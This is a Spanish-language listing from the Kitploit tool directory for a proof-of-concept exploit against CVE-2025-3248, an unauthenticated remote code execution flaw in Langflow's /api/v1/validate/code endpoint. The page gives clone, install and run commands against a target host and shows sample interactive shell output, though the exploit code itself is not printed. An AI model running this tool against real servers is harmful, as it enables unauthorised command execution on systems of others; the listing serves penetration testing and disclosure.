Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3248 — Exploit para Langflow AI Remote Code Execution (No autenticado) | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2025-3248
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoSeguridad de IA
GitHub0xgh057r3c0n/cve-2025-3248

CVE-2025-3248

Exploit para Langflow AI Remote Code Execution (No autenticado)

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3248 — Ejecución Remota de Código en Langflow AI (Sin Autenticación)

Autor: 0xgh057r3c0n

Descripción

Este exploit apunta a una vulnerabilidad crítica de RCE sin autenticación (CVE-2025-3248) en Langflow AI. La vulnerabilidad permite a un atacante ejecutar comandos arbitrarios del sistema en el servidor objetivo a través del endpoint /api/v1/validate/code.

Esta herramienta de prueba de concepto (PoC) proporciona un shell interactivo para probar y demostrar el problema.


Requisitos previos

  • Python 3.8 o más reciente
  • pip3 para instalar dependencias

Instalación

1. Clonar el repositorio

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248

2. Instalar dependencias de Python

root@kitploit:~
pip3 install -r requirements.txt

Uso

root@kitploit:~
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT

Ejemplo

root@kitploit:~
python3 CVE-2025-3248.py -u http://127.0.0.1:7860

Se le presentará un shell interactivo:

root@kitploit:~
0xgh057r3c0n@root💀$ whoami
langflow

0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
  • Para salir: escriba exit o quit
  • Soporta comandos típicos de shell Linux/Unix

Notas

  • La verificación SSL está deshabilitada (útil para probar certificados autofirmados)
  • Esta PoC es solo para fines educativos y de pruebas autorizadas

Licencia

Este proyecto está bajo la Licencia MIT — consulte el archivo LICENSE para más detalles.


Descargo de responsabilidad

Este software se proporciona únicamente con fines educativos y de investigación. El autor no asume ninguna responsabilidad por el uso indebido de este código. Úselo solo en sistemas de su propiedad o para los que tenga permiso explícito para probar.

Descargar herramienta